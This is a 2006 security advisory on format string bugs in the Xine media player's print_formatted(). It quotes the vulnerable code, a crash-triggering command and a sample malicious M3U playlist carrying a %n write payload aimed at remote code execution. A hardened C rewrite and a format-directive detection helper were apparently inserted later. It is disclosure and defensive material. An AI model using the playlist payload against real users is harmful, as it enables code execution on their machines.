
Remote Xine Format String Vulnerability



/*
 
*****************************************************************************************************************
  $ An open security advisory #16 - Xine Media Player Format String Bug
 
*****************************************************************************************************************
  1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com -+- www.open-security.org
  2: Bug Released: April 18th 2006
  3: Bug Impact Rate: Undefined
  4: Bug Scope Rate: Local / Remote
 
*****************************************************************************************************************
  $ This advisory and/or proof of concept code must not be used for commercial gain.
 
*****************************************************************************************************************

  Xine Media Player
  http://winehq.de

  "xine is a free multimedia player. It plays back CDs, DVDs, and VCDs. It also decodes multimedia files like AVI, MOV, WMV, and MP3 from local disk drives, and displays multimedia streamed over the Internet. It interprets many of the most common multimedia formats available - and some of the most uncommon formats, too."


  There are 2 format string bugs in the latest version of Xine that could be exploited by a malicious person to execute code on the system of a remote user running the media player against a malicious playlist file. By passing a format specifier in the path of a file that is embedded in a remote playlist, it is possible to trigger this bug.


  The evil code can be found here, in xine-ui-0.99.4/src/xitk/main.c:453:
  ... snip ...

  static void print_formatted(char *title, const char *const *plugins) {
    const char  *plugin;
    char         buffer[81];
    int          len;
    char        *blanks = "     ";

    printf(title);          // format string sink: title is the format, not a %s argument

    sprintf(buffer, "%s", blanks);
    plugin = *plugins++;

    while(plugin) {

      len = strlen(buffer);

      if((len + (strlen(plugin) + 3)) < 80) {
        sprintf(buffer, "%s%s%s", buffer, (strlen(buffer) == strlen(blanks)) ? "" : ", ", plugin);
      }
      else {
        printf(buffer);     // format string sink: buffer (built from plugin strings) is the format
        printf(",\n");
        snprintf(buffer, sizeof(buffer), "%s%s", blanks, plugin);
      }

  ... snip ...


  Looking at BUG-REPORT.txt we can verify the goodness:

  c0ntex@debauch:~$ xine --no-splash --bug-report -gI AAAAAAAA%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
  This is xine (X11 gui) - a free video player v0.99.3.
  (c) 2000-2004 The xine Team.
  xiTK received SIGSEGV signal, RIP.
  Aborted
  c0ntex@debauch:~$ less BUG-REPORT.txt

  ... snip ...
  xine: found input plugin  : file input plugin

  ---------------------- (ERROR) ----------------------
  The specified file or mrl is not found. Please check it twice. (AAAAAAAA811bfb1be1fdac88e232888e23298000206568546365707365696669696620646f20656c726d20727369206c746f6e20756f6620202e646e61656c50632065736b636568207469206369777428202e65  [4141414141414141]  7825782578257825782578257825782578257825)
  ... snip ...


  An example malicious playlist file to trigger the bug:


  #EXTM3U
  #EXTINFO !!All_You_Playlists_Are_Belong_To_Us - SHHEEEELLLLCCCCOOOOOODDDDDDEEEEEEEEEEE!!
  AAAAAAAAAAA%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%.13068u%n%hn


  Obviously, we can see straight away that this is a straightforward format string bug which provides a trivial way to hijack .DTORS or some other useful address, allowing the execution of malicious code on a remote victim's boxen.
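A hardened counterpart of the print_formatted() snippet above, added here as an illustration and not xine's code: untrusted text is only ever passed as a %s argument, every write into the 81-byte line buffer is bounded, and the output is rendered into a caller-supplied buffer so it can be checked. has_format_directive() is an assumed helper, not from xine, for flagging playlist entries or MRLs that carry a conversion specifier before they reach logging code.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

// Hardened rewrite of print_formatted(): renders the title and the plugin list
// into out (bounded) instead of printing, so the result can be inspected.
// Untrusted strings are only ever %s arguments, never the format string.
// Returns the number of list lines written, or -1 if out is too small.
int render_plugin_list(char *out, size_t outsz,
                       const char *title, const char *const *plugins) {
    char line[81];                 // same 80-column line buffer as the original
    const char *blanks = "     ";
    size_t used;
    int lines = 0, n;

    n = snprintf(out, outsz, "%s", title);   // was: printf(title)
    if (n < 0 || (size_t)n >= outsz) return -1;
    used = (size_t)n;

    snprintf(line, sizeof line, "%s", blanks);
    for (const char *p = *plugins; p; p = *++plugins) {
        size_t len = strlen(line);
        if (len + strlen(p) + 3 < 80) {
            // append in place; no overlapping sprintf(line, "%s...", line, ...)
            snprintf(line + len, sizeof line - len, "%s%s",
                     len == strlen(blanks) ? "" : ", ", p);
        } else {
            n = snprintf(out + used, outsz - used, "%s,\n", line);   // was: printf(line)
            if (n < 0 || (size_t)n >= outsz - used) return -1;
            used += (size_t)n;
            lines++;
            snprintf(line, sizeof line, "%s%s", blanks, p);
        }
    }
    n = snprintf(out + used, outsz - used, "%s\n", line);
    if (n < 0 || (size_t)n >= outsz - used) return -1;
    return lines + 1;
}

// Assumed helper: true if s carries a printf conversion (a '%' that is not
// the "%%" escape). Useful for flagging playlist entries / MRLs in logs.
bool has_format_directive(const char *s) {
    for (; *s; s++) {
        if (*s != '%') continue;
        if (s[1] == '%') { s++; continue; }
        return true;
    }
    return false;
}
```

With the advisory's "AAAA%x..." style title the directives come out verbatim in the rendered text instead of being interpreted, and a list longer than 80 columns wraps onto further lines exactly as the original intended.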

  I dropped in to the Xine developers' IRC channel over a year ago telling them about this bug. I never got a reply; it's my guess that they are as sick of Xine bugs as everyone else is. I hope you haven't been using Xine to play remote Music fileZ!!! tsk tsk - those that have know who they are ;) and we do too :D

  We are not dropping exploit code with this advisory so that Xine can get their act together, write decent code, and release a patched version. I guess the Xine guys haven't heard of egrep. Anyway, maybe they will patch up before more people get owned.


  Full Disclosure -> Useful for the victims
  Open Source -> Useful for the hackers
  Shameless 1980's format string bug -> Priceless


  Regards to everyone I know, especially all the #social's @ pulltheplug.

*/